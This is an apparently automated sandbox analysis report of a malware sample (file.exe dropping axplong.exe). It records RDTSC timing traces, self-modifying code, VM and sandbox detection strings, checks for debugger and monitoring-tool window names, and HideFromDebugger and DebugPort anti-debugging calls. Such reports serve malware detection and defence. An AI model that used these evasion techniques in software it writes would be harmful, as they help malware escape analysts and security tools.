                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040B24 second address: 5040B65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F1BE755725Dh 0x00000011 jmp 00007F1B751F19E4h 0x00000016 mov edx, dword ptr [ebp+0Ch] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F1B751F19E7h 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040B65 second address: 5040B6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040B6B second address: 5040B6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040B6F second address: 5040B86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040B86 second address: 5040B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040B8B second address: 5040BC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F1B74BBC1D1h 0x0000000f xchg eax, ebx 0x00000010 jmp 00007F1B74BBC1CEh 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040BC3 second address: 5040BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F1B751F19E3h 0x0000000a adc eax, 09420CAEh 0x00000010 jmp 00007F1B751F19E9h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040BFC second address: 5040CB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F1B74BBC1CDh 0x00000012 sbb al, FFFFFF96h 0x00000015 jmp 00007F1B74BBC1D1h 0x0000001a popfd 0x0000001b movzx eax, dx 0x0000001e popad 0x0000001f pushfd 0x00000020 jmp 00007F1B74BBC1CDh 0x00000025 add eax, 276F2CF6h 0x0000002b jmp 00007F1B74BBC1D1h 0x00000030 popfd 0x00000031 popad 0x00000032 xchg eax, ebx 0x00000033 jmp 00007F1B74BBC1CEh 0x00000038 push dword ptr [ebp+14h] 0x0000003b pushad 0x0000003c push esi 0x0000003d pushfd 0x0000003e jmp 00007F1B74BBC1CDh 0x00000043 xor al, 00000006h 0x00000046 jmp 00007F1B74BBC1D1h 0x0000004b popfd 0x0000004c pop eax 0x0000004d mov ecx, edx 0x0000004f popad 0x00000050 push dword ptr [ebp+10h] 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F1B74BBC1D6h 0x0000005a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040CE3 second address: 5040CFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040CFF second address: 5040D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040D03 second address: 5040D09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040D09 second address: 5040D39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1B74BBC1D7h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040D39 second address: 5040D51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1B751F19E4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040D51 second address: 5040D69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esp, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040D69 second address: 5040D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 45C4E834h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040D73 second address: 5040D90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1B74BBC1D9h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050BD2 second address: 5050BD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050BD8 second address: 5050BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050BDC second address: 5050BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0A61 second address: 50C0A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0A65 second address: 50C0A80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0A80 second address: 50C0AA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0AA4 second address: 50C0AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0AA8 second address: 50C0AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B0DBE second address: 50B0E03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1B751F19E7h 0x00000009 jmp 00007F1B751F19E3h 0x0000000e popfd 0x0000000f mov ch, 52h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F1B751F19DEh 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B0E03 second address: 50B0E09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B0E09 second address: 50B0E0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050EDD second address: 5050EFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F1B74BBC1D1h 0x00000008 pop ecx 0x00000009 mov cx, dx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050EFF second address: 5050F05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050F05 second address: 5050F0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050F0B second address: 5050F56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F1B751F19DEh 0x00000015 xor ecx, 5124E358h 0x0000001b jmp 00007F1B751F19DBh 0x00000020 popfd 0x00000021 mov dl, cl 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 mov cl, bh 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050F56 second address: 5050FA4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1B74BBC1D8h 0x00000008 adc esi, 25BB34E8h 0x0000000e jmp 00007F1B74BBC1CBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 pushad 0x00000018 popad 0x00000019 pop edi 0x0000001a popad 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F1B74BBC1D7h 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050FA4 second address: 5050FAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C01DE second address: 50C0264 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F1B74BBC1CCh 0x00000011 add ax, 52F8h 0x00000016 jmp 00007F1B74BBC1CBh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F1B74BBC1D8h 0x00000022 or ax, AD58h 0x00000027 jmp 00007F1B74BBC1CBh 0x0000002c popfd 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 jmp 00007F1B74BBC1D6h 0x00000035 push dword ptr [ebp+0Ch] 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov cx, di 0x0000003e popad 0x0000003f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0264 second address: 50C0283 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0283 second address: 50C0287 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0287 second address: 50C028D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C02DC second address: 50C02E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C02E2 second address: 50C0314 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx eax, al 0x0000000c jmp 00007F1B751F19E0h 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0314 second address: 50C0318 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0318 second address: 50C031E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507034E second address: 5070352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070352 second address: 5070356 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070356 second address: 507035C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507035C second address: 50703BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, eax 0x00000005 mov esi, 0CF14E8Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F1B751F19DCh 0x00000015 or ah, FFFFFF98h 0x00000018 jmp 00007F1B751F19DBh 0x0000001d popfd 0x0000001e mov dl, ah 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 movzx esi, di 0x00000026 pushfd 0x00000027 jmp 00007F1B751F19DDh 0x0000002c sbb ecx, 101F2436h 0x00000032 jmp 00007F1B751F19E1h 0x00000037 popfd 0x00000038 popad 0x00000039 xchg eax, ebp 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50703BD second address: 50703C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50703C1 second address: 50703C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50703C5 second address: 50703CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50703CB second address: 50703D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50703D1 second address: 50703D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50703D5 second address: 50703FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F1B751F19E8h 0x0000000f push FFFFFFFEh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50703FF second address: 5070403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070403 second address: 5070420 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070420 second address: 507047A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 mov ax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c call 00007F1B74BBC1C9h 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F1B74BBC1CBh 0x00000018 sbb ecx, 508EBCDEh 0x0000001e jmp 00007F1B74BBC1D9h 0x00000023 popfd 0x00000024 mov ah, 4Bh 0x00000026 popad 0x00000027 push eax 0x00000028 jmp 00007F1B74BBC1CAh 0x0000002d mov eax, dword ptr [esp+04h] 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507047A second address: 507047E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507047E second address: 5070484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070484 second address: 507048E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 51AAAC08h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507048E second address: 50704D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F1B74BBC1CCh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jmp 00007F1B74BBC1CBh 0x00000017 pop eax 0x00000018 jmp 00007F1B74BBC1D6h 0x0000001d push 3781417Bh 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50704D3 second address: 50704D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50704D8 second address: 5070526 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 40B9EF7Bh 0x00000010 jmp 00007F1B74BBC1D0h 0x00000015 mov eax, dword ptr fs:[00000000h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F1B74BBC1D7h 0x00000022 rdtsc
                    Tries to evade debugger and weak emulator (self modifying code)
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A54A65 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 88EB1D instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 904A65 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 73EB1D instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_050C01A1 rdtsc 1_2_050C01A1
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 421Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 2037Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1904Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5332Thread sleep count: 52 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5332Thread sleep time: -104052s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5348Thread sleep count: 54 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5348Thread sleep time: -108054s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3872Thread sleep count: 421 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3872Thread sleep time: -12630000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5476Thread sleep count: 57 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5476Thread sleep time: -114057s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6404Thread sleep time: -360000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3360Thread sleep count: 2037 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3360Thread sleep time: -4076037s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4972Thread sleep count: 1904 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4972Thread sleep time: -3809904s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                    Source: axplong.exe, axplong.exe, 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: file.exe, 00000001.00000003.2210243151.000000000133C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                    Source: axplong.exe, 00000008.00000002.3426692930.0000000001109000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000008.00000002.3426692930.00000000010CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: file.exe, 00000001.00000002.2236169824.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2262480640.00000000008BD000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2272495754.00000000008BD000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Hides threads from debuggers
                    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Potentially malicious time measurement code found
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_04FD0D0E Start: 04FD0DFF End: 04FD0D228_2_04FD0D0E
                    Tries to detect sandboxes and other dynamic analysis tools (window names)
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SIWVID
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
